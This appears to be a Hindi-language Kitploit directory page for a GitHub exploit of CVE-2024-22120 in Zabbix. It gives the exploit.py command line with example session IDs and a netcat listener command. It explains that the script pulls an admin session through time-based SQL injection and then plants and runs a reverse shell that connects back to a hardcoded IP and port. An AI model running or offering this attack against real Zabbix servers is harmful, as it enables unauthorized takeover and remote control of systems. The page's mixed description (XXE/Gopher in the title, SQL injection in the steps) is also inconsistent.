Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ispique/cve-2024-22120-rce-with-gopher
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubispique/cve-2024-22120-rce-with-gopher

CVE-2024-22120-RCE-with-gopher

यह CVE-2024-22120 के लिए मेरा एक्सप्लॉइट है, जिसमें Gopher पेलोड के साथ XXE के अंदर एक SSRF कमजोरी शामिल है।

रिपॉजिटरी देखें
312 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

उपयोग

root@kitploit:~
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>

उदाहरण परिदृश्य

आपने IP 192.168.1.100 पर चल रहे एक Zabbix सर्वर की पहचान की है, और आपके पास निम्नलिखित विवरण वाले निम्न-विशेषाधिकार वाले उपयोगकर्ता तक पहुंच है:

  • सत्र आईडी (sid): d82bf6715e1d3c1f25
  • होस्ट आईडी (hostid): 10107
  • PHP सत्र आईडी (phpsessid): a4g7f48d9j3r7h8s9g

आप इस स्क्रिप्ट का उपयोग करके RCE कमजोरियों का शोषण करना चाहते हैं।

स्क्रिप्ट चलाना

root@kitploit:~
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3

पैरामीटर स्पष्टीकरण:

  • --ip 192.168.1.100: Zabbix सर्वर का IP पता।
  • --sid d82bf6715e1d3c1f25: निम्न-विशेषाधिकार वाले उपयोगकर्ता का सत्र आईडी।
  • --hostid 10107: एक होस्ट का आईडी जिसे निम्न-विशेषाधिकार वाला उपयोगकर्ता एक्सेस कर सकता है।
  • --phpsessid a4g7f48d9j3r7h8s9g: प्रमाणीकरण अनुरोधों के लिए उपयोग किया जाने वाला PHP सत्र आईडी।
  • --false_time 1: SQL इंजेक्शन के दौरान गलत अनुमान के मामले में सोने का समय सेकंड में (डिफ़ॉल्ट 1 सेकंड है)।
  • --true_time 3: SQL इंजेक्शन के दौरान सही अनुमान के मामले में सोने का समय सेकंड में (डिफ़ॉल्ट 3 सेकंड है)।

आगे क्या होता है:

  1. स्क्रिप्ट समय-आधारित SQL इंजेक्शन का उपयोग करके व्यवस्थापक सत्र आईडी निकालने का प्रयास करके शुरू करेगी।
  2. व्यवस्थापक सत्र आईडी प्राप्त होने के बाद, स्क्रिप्ट Zabbix सर्वर पर एक रिवर्स शेल स्क्रिप्ट बनाएगी।
  3. अंत में, स्क्रिप्ट रिवर्स शेल को निष्पादित करेगी, जो आपकी मशीन पर निर्दिष्ट IP और पोर्ट (स्क्रिप्ट में 10.0.46.27:5555`) से वापस कनेक्ट होगी।

नोट्स:

  • सुनिश्चित करें कि रिवर्स शेल को पकड़ने के लिए आपकी मशीन निर्दिष्ट पोर्ट (स्क्रिप्ट में 5555) पर सुन रही है। इसके लिए आप netcat` का उपयोग कर सकते हैं:

    root@kitploit:~
    nc -lvnp 5555
    
  • रिवर्स शेल प्राप्त करने के लिए CreateScript फ़ंक्शन में IP 10.0.46.27 और पोर्ट 5555 को अपने स्वयं के IP और वांछित पोर्ट से बदलें।

टूल डाउनलोड करें